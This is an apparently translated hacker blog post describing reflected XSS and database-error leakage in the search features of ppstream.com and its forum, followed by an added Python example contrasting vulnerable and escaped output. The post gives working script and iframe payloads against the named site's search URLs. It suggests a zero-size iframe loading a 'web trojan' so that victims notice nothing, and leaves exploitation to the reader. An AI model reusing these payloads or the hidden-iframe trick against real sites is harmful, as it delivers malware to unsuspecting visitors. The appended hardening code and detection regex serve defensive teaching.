The day before yesterday Heiyanquan sent me a site, http://www.ppstream.com/, and asked me to look for vulnerabilities. I checked its ranking... wow, global rank 589. A site like that should by rights have a pretty high level of security, so going after SQL injection was unlikely to get far. Looking at the homepage, there is a program search. I entered <script>alert("fhod")</script> at http://so.ppstream.com/?key=<script&g ... ")</script> and got this error message:

[handle]QUERY STRING:select count(channel_name) from pps_channel_info where contains(playbill,?,1)>0 Biuld Array:Array( [0] => )[Last query: select count(channel_name) from pps_channel_info where contains(playbill,:0,1)>0 ][Native code: 29902][Native message: ORA-29902: error in executing ODCIIndexStart() routineORA-20000: Oracle Text error:DRG-50900: text query parser error on line 1, column 9 DRG-50905: invalid score threshold ALERT ]Error Message:MDB2 Error: unknown error

What I typed was converted to uppercase, <SCRIPT>ALERT("FHOD")</SCRIPT>, but no alert popped up. So I tried searching for <iframe src=http://www.ciker.org/ width=200 height=200></iframe>
[screenshot]
Heh. See that? If you set width and height both to 0 and replace the address with our web trojan, would anyone be suspicious of a link like that? http://so.ppstream.com/search/?key= After encoding, the address is: [screenshot]
http://so.ppstream.com/search/?key= Also, http://club.ppstream.com/ has the same problem. Search for <script>alert("fhod")</script> [screenshot]
By the same principle, searching for an iframe works there too. After encoding: http://club.ppstream.com/index.php?m=search&search_text=&search_type=2&x=22&y=8 [screenshot]
How to make use of it is up to you..
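As an added example (not code from the original post, nor from the PPStream site), here is a small Python model of the two defects described above: the search term being reflected into the page unescaped, and the database error text (the Oracle Text query and DRG-* messages) being shown to the visitor. It shows the reflection next to its escaped form, a generic error page that logs the detail server-side instead, and a case-insensitive detection check, since the post notes the server upper-cased the input (`<SCRIPT>` is still a script tag to a browser). Function names and sample inputs are my own and are constructed for illustration.

```python
import html
import logging
import re

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("search")

# Constructed sample search terms (hypothetical, not taken from the post's URLs).
SAMPLE_QUERIES = [
    "fhod",
    '<script>alert("fhod")</script>',
    "<iframe src=http://example.invalid/ width=0 height=0></iframe>",
]


def render_vulnerable(key: str) -> str:
    """Reflect the search term into HTML without escaping: the bug class in the post."""
    return f"<p>Results for: {key}</p>"


def render_hardened(key: str) -> str:
    """Escape the term for an HTML text context before reflecting it.

    quote=True also turns " and ' into entities, so the value is safe inside
    attribute values as well as element text.
    """
    return f"<p>Results for: {html.escape(key, quote=True)}</p>"


def error_response(native_message: str) -> str:
    """Return a generic error page; keep the DB driver's message in the server log only.

    The post shows the full Oracle Text query and ORA-/DRG- codes being sent to
    the browser, which tells a visitor the backend, the table name and the query shape.
    """
    log.error("search backend error: %s", native_message)
    return "<p>Sorry, the search could not be completed.</p>"


# Case-insensitive tag check for request logs or a WAF rule: upper-casing the
# input (as the server in the post did) does not neutralise HTML tags.
TAG_RE = re.compile(r"<\s*/?\s*(script|iframe|object|embed|img|svg)\b", re.IGNORECASE)


def looks_like_markup_injection(key: str) -> bool:
    """True when the search term contains an HTML tag that can run script or load content."""
    return TAG_RE.search(key) is not None


if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print("input      :", q)
        print("vulnerable :", render_vulnerable(q))
        print("hardened   :", render_hardened(q))
        print("flagged    :", looks_like_markup_injection(q))
        print()
    # Constructed driver message standing in for the kind of text the post shows.
    print(error_response("ORA-20000: Oracle Text error (constructed sample)"))
```

Running the script prints each sample term as it would be reflected before and after escaping; the escaped form contains no `<` or `>` and so cannot open a tag, whichever case the server folds it to.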